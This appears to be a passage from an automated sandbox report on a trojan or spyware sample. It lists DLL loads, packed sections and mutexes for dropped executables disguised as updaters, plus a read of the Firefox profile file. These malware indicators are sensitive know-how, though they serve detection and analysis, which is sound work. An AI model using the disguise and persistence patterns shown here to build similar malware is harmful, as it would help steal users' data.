                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: windows.shell.servicehostbuilder.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: ieframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: mlang.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: policymanager.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: msvcp110_win.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: pcacli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: sfc_os.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: ieframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: ieframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: ieframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: mstask.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: dui70.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: duser.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: chartv.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: oleacc.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: atlthunk.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wtsapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: winsta.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: explorerframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: profapi.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: apphelp.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: acgenral.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: winmm.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: samcli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: msacm32.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: version.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: userenv.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: dwmapi.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: urlmon.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: mpr.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sspicli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: winmmbase.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: winmmbase.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: iertutil.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: srvcli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: netutils.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: aclayers.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sfc.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sfc_os.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: apphelp.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: acgenral.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: winmm.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: samcli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: msacm32.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: version.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: userenv.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: dwmapi.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: urlmon.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: mpr.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sspicli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: winmmbase.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: winmmbase.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: iertutil.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: srvcli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: netutils.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: aclayers.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sfc.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sfc_os.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: kernel.appcore.dll
                          Source: I2jCDr35mu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: I2jCDr35mu.exeStatic PE information: Section: ZLIB complexity 0.9993802584134616
                          Source: I2jCDr35mu.exeStatic PE information: Section: awogigmw ZLIB complexity 0.9910564070865556
                          Source: RageMP131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9993802584134616
                          Source: RageMP131.exe.0.drStatic PE information: Section: awogigmw ZLIB complexity 0.9910564070865556
                          Source: MPGPH131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9993802584134616
                          Source: MPGPH131.exe.0.drStatic PE information: Section: awogigmw ZLIB complexity 0.9910564070865556
                          Source: plaza[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: plaza[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: plaza[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: ladas[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: ladas[1].exe.0.drStatic PE information: Section: gakjennq ZLIB complexity 0.9947299890350877
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: amert[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: amert[1].exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: EdgeMS131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: EdgeMS131.exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: niks[1].exe.0.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: Section: gakjennq ZLIB complexity 0.9947299890350877
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: plaza[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: plaza[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: plaza[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: ladas[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: amert[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: amert[1].exe.7.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: niks[1].exe.7.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: explorgu.exe.47.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: explorgu.exe.47.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@192/738@0/95
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\RageMP131Jump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10376:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10612:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\rage131MP.tmpJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: I2jCDr35mu.exe, 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, I2jCDr35mu.exe, 00000000.00000003.2093800693.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3322219545.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000006.00000003.2145688572.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3200225200.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000003.2145890043.0000000005190000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2346163083.0000000000351000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000008.00000003.2256368231.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000003.2356250685.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2622415113.0000000000351000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
